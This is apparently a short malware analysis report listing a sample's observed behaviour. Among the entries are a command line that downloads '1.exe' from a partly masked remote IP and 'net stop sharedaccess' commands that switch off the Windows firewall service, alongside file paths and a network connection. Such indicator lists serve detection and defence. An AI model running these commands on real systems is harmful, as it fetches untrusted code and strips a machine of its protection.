Technical Information
- C:\1.exe
- <Current directory>\wps.exe -url="http://61.##7.115.210/ftp_doyo/1.exe" -param="" -s -local_dir="c:\"
- C:\1.exe (downloaded from the Internet)
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\net.exe stop sharedaccess
- C:\1.exe.dt!
- <Current directory>\wps.exe
- %TEMP%\~DF17A7.tmp
- from C:\1.exe.dt! to C:\1.exe
- '61.##7.115.210':80
- 61.##7.115.210/ftp_doyo/1.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''